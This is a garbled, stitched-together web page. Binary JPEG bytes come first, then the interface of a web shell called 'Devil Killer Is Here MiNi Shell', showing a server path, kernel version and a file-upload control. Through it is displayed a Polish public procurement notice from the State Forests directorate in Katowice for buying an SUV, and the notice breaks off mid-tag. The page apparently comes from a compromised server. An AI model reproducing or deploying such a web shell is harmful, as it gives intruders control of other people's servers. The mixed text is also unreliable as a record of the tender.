JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230516/0021831901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup fabrycznie nowego samochodu osobowego typu SUV rok produkcji 2023 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PAŃSTWOWE GOSPODARSTWO LEŚNE LASY PAŃSTWOWE REGIONALNA DYREKCJA LASÓW PAŃSTWOWYCH W KATOWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272537539</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Huberta 43/45</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-543</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.katowice.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup fabrycznie nowego samochodu osobowego typu SUV rok produkcji 2023 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d2f2a64f-f2ea-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00218319</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00051743/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup fabrycznie nowego samochodu osobowego typu SUV rok produkcji 2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/profile/6340257913 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu<br/>platformy https://josephine.proebiz.com/pl oraz poczty elektronicznej, z zastrzeżeniem, że złożenie Oferty następuje wyłącznie przy<br/>użyciu platformy https://josephine.proebiz.com/pl<br/><br/>https://josephine.proebiz.com/pl/profile/6340257913<br/><br/>Ofertę oraz oświadczenie o którym mowa w art. 125 ust. 1 PZP, składa się, pod rygorem nieważności, w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z platformy na stronie internetowej<br/>https://josephine.proebiz.com/pl<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty oraz<br/>do komunikacji wynosi 300 MB.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich złożenia na platformie https://josephine.proebiz.com/pl lub<br/>ich otrzymania przez Zamawiającego na wskazany w pkt 10.1. adres e-mail, z zastrzeżeniem, że oferta może zostać złożona<br/>wyłącznie przy użyciu platformy https://josephine.proebiz.com/pl<br/>Zamawiający, zgodnie zapisami rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania<br/>i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) określa niezbędne wymagania<br/>techniczne umożliwiające pracę na platformie https://josephine.proebiz.com/pl. Wymagania techniczne znajdują się w stopce ekranu<br/>głównego oprogramowania JOSEPHINE po kliknięciu w słowo Wsparcie https://josephine.proebiz.com/pl/support<br/>Informacje organizacyjne takie jak opis ekranu głównego portalu https://josephine.proebiz.com/pl, rejestracja wykonawcy,<br/>wprowadzenie podpisu elektronicznego użytkownika wykonawcy, logowanie się za pomocą hasła, logowanie się za pomocą podpisu<br/>elektronicznego ,składanie oferty i wymaganych dokumentów, elektroniczna komunikacja znajdują się w dokumencie JOSEPHINE –<br/>Skrócona Instrukcja – Wykonawca, który dostępny jest do pobrania z ekranu głównego portalu JOSEPHINE.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119<br/>z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych<br/>osobowych jest Państwowe Gospodarstwo Leśne Lasy Państwowe Regionalna Dyrekcja Lasów<br/>Państwowych w Katowicach.<br/>2) Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie<br/>zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem.<br/>3) Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP, do upływu terminu<br/>do ich wniesienia.<br/>4) Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone<br/>wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich<br/>danych są obowiązane do zachowania ich w poufności.<br/>5) Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego<br/>rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP –<br/>w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>6) Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja<br/>postępowania zostanie udostępniona w oparciu o przepisy PZP.<br/>7) Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie<br/>zamówienia publicznego.<br/>8) Niezależnie od postanowień pkt 21.7. powyżej, w przypadku zawarcia umowy w sprawie<br/>zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia<br/>roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>9) Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi<br/>prawne i konsultingowe.<br/>10) Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane<br/>w sposób zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">c.d. z poprzedniego akapitu:<br/>11) Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane<br/>osobowe, ma prawo:<br/>• dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji,<br/>gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1 -3 RODO wymagałoby<br/>Strona 6 z 20<br/>niewspółmiernie dużego wysiłku Zamawiający może żądać wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy<br/>lub daty bieżącego bądź zakończonego postępowania o udzielenie zamówienia<br/>publicznego;<br/>• do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym<br/>skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osobowych,<br/>o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie<br/>niezgodnym z PZP oraz nie może naruszać integralności protokołu oraz jego<br/>załączników;<br/>• do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust.<br/>2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania<br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub<br/>z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego; prawo to nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego;<br/>• wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku<br/>uznania, iż przetwarzanie jej danych osobowych narusza przepisy o ochronie danych<br/>osobowych, w tym przepisy RODO.<br/>12) Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych określa PZP.<br/>13) Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku<br/>z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie<br/>przysługuje:<br/>• prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub<br/>e RODO;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone<br/>w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to<br/>z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust.<br/>1 lit. c RODO.<br/>14) Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub<br/>innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania<br/>realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej,<br/>w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego.<br/>Dane osobowe są przekazywane do podmiotów przetwarzających dane w imieniu<br/>administratora danych osobowych.<br/>15) Polityka prywatności Zamawiającego – Polityka Przetwarzania Danych Osobowych Regionalnej<br/>Dyrekcji Lasów Państwowych w Katowicach jest do pobrania na jej stronie internetowej<br/>Biuletynu Informacji Publicznej pod adresem: https://www.gov.pl/web/regionalna-dyrekcjalasow-<br/>panstwowych-w-katowicach/polityka-prywatnosci</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RR.270.2.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest Zakup fabrycznie nowego samochodu osobowego<br/>typu SUV rok produkcji 2023. Opis techniczny został zawarty w Załączniku nr 7 do SWZ.<br/>Warunki realizacji zamówienia zawarto w Załączniku nr 3 do SWZ – istotne postanowienia<br/>umowy.<br/><br/>UWAGA! Przez zapis samochód fabrycznie nowy Zamawiający rozumie samochód<br/>nieużytkowany wcześniej (inny niż np.: samochód powystawowy, testowy, zastępczy itp.). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34100000-8 - Pojazdy silnikowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34110000-1 - Samochody osobowe</p> <p class="mb-0">34113000-2 - Pojazdy z napędem na 4 koła</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oceny ofert będzie dokonywała komisja. W toku badania i oceny ofert Zamawiający może żądać<br/>od Wykonawców wyjaśnień dotyczących treści złożonych ofert. Zamawiający poprawi w ofercie<br/>omyłki zgodnie z przepisami Pzp.<br/>2) Zamawiający wyznaczył następujące kryteria oceny i wyboru oferty:<br/>Cena 60 pkt<br/>Termin dostawy 10 pkt<br/>Gwarancja 30 pkt<br/>3) Ofertom zostaną przyznane punkty wg wzoru: P=C + T + G<br/>4) Sposób oceny oferty w kryterium „Cena oferty”:<br/>C = (najniższa cena spośród badanych ofert): (cena oferty badanej) * 60 pkt<br/>Wynik powyższego działania zostanie zaokrąglony do 2 miejsc po przecinku.<br/>5) Termin dostawy:<br/>• 31.12.2023r. – 0 pkt<br/>• 30.11.2023r. – 5 pkt<br/>• 31.10.2023r. – 10 pkt<br/>Sposób obliczenia punktów dla kryterium termin dostawy:<br/>a. Kryterium termin dostawy na całość zamówienia będzie rozpatrywane na podstawie<br/>zadeklarowanego w formularzu ofertowym terminu dostawy przedmiotu zamówienia.<br/>b. Zamawiający żąda bezwzględnie aby dostawa przedmiotu zamówienia odbyła się<br/>w terminie do dnia 31.12.2023 r.<br/>c. Jeżeli wykonawca, w formularzu ofertowym, zadeklaruje dostawę samochodu w terminie<br/>po dniu 31.12.2023 r. to przygotuje ofertę niezgodnie z SWZ co skutkować będzie<br/>odrzuceniem oferty. W przypadku niewypełnienia w formularzu ofertowym stosownej<br/>rubryki zamawiający uzna, że wykonawca deklaruje termin dostawy 31.12.2023 r.<br/>d. Jeżeli wykonawca, w formularzu ofertowym, zadeklaruje dostawę samochodu w terminie<br/>od dnia 1.12.2023 r do dnia 31.12.2023 r. to otrzyma 0 pkt.<br/>e. Jeżeli wykonawca, w formularzu ofertowym, zadeklaruje dostawę samochodu w terminie<br/>od dnia 1.11.2023 r. do dnia 30.11.2023 r. to otrzyma 5 pkt.<br/>f. Jeżeli wykonawca, w formularzu ofertowym, zadeklaruje dostawę samochodu w terminie<br/>do dnia 31.10.2023 r. to otrzyma 10 pkt.<br/>6) W kryterium „Gwarancja” Zamawiający przyzna 30 punktów odpowiadające 30% ogólnej ocenie<br/>oferty.<br/>Sposób obliczania punktów dla w/w kryterium:<br/>G - Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium,<br/>przyjmuje się 30 pkt. w przypadku udzielenia 4 letniej (48 miesiące) gwarancji na dostarczony pojazd.<br/>Gwarancja w miesiącach Liczba punktów<br/>36 miesięcy - 0 pkt<br/>42 miesiące - 15 pkt<br/>48 miesięcy - 30 pkt<br/>Sposób obliczenia punktów dla kryterium okres gwarancji jakości:<br/>g. Kryterium gwarancji jakości na całość zamówienia będzie rozpatrywane na podstawie<br/>zadeklarowanego w formularzu ofertowym okresu gwarancji jakości.<br/>h. Najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego to 36 miesięcy<br/>liczonych od daty dostawy, przy czym bieg gwarancji rozpoczyna się z datą protokołu<br/>przekazania pojazdu.<br/>i. Najdłuższy możliwy okres gwarancji jaki będzie uwzględniany przy ocenie oferty to okres<br/>48 miesięcy.<br/>j. Jeżeli wykonawca wpisze okres gwarancji krótszy niż 36 miesięcy to przygotuje ofertę<br/>niezgodnie z SWZ co skutkować będzie odrzuceniem oferty. W przypadku niewypełnienia<br/>w formularzu ofertowym stosownej rubryki zamawiający uzna, że wykonawca deklaruje<br/>najkrótszy tj. 36 miesięczny okres gwarancji jakości.<br/>7) Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ocenę (największą sumę<br/>punktów we wszystkich kryteriach, z dokładnością do dwóch miejsc po przecinku).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określił warunki udziału w postępowaniu w sposób proporcjonalny do przedmiotu<br/>zamówienia oraz umożliwiający ocenę zdolności wykonawcy do należytego wykonania<br/>zamówienia, w szczególności wyrażając je jako minimalne poziomy zdolności.<br/>Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów,<br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne<br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>Zdolności technicznej lub zawodowej: Wykonawca musi posiadać wiedzę i doświadczenie oraz<br/>dysponować potencjałem technicznym i osobami zdolnymi do<br/>wykonywania przedmiotowego zamówienia. Wykonawca spełni<br/>warunek jeżeli wykaże, że:<br/>- w okresie ostatnich 3 lat przed upływem terminu składania ofert,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie<br/>wykonał należycie zamówienie na dostawę fabrycznie nowych<br/>samochodów o wartości co najmniej 200.000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span 